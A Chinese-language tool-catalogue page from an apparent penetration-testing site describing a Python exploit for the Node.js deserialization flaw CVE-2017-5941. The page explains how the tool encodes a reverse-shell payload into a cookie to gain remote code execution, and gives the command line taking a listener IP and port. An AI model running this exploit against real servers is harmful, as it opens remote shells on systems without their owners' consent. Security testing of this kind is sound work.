黑客、渗透测试和网络安全工具,武装您的安全武器库!
NodeJs反序列化反弹Shell利用 (CVE-2017-5941)
发现我们社区最常用的工具。
探索所有工具
浏览我们的工具集合
该漏洞利用工具会自动生成反向Shell有效载荷,该载荷先编码为十进制,再编码为Base64。之后,此有效载荷通过HTTP POST请求发送,该请求会序列化用户输入并将其存储在Cookie中。然后,我们通过GET请求访问即可获得RCE。
使用方法:
python3 nodejshell.py <lhost> <lport>
lhost: 你的本地IP地址 lport: 你想要连接反向Shell的端口
之后你只需提供一些简单的信息:
完成上述步骤后,只需启动你喜欢的监听器,然后等待接收连接即可。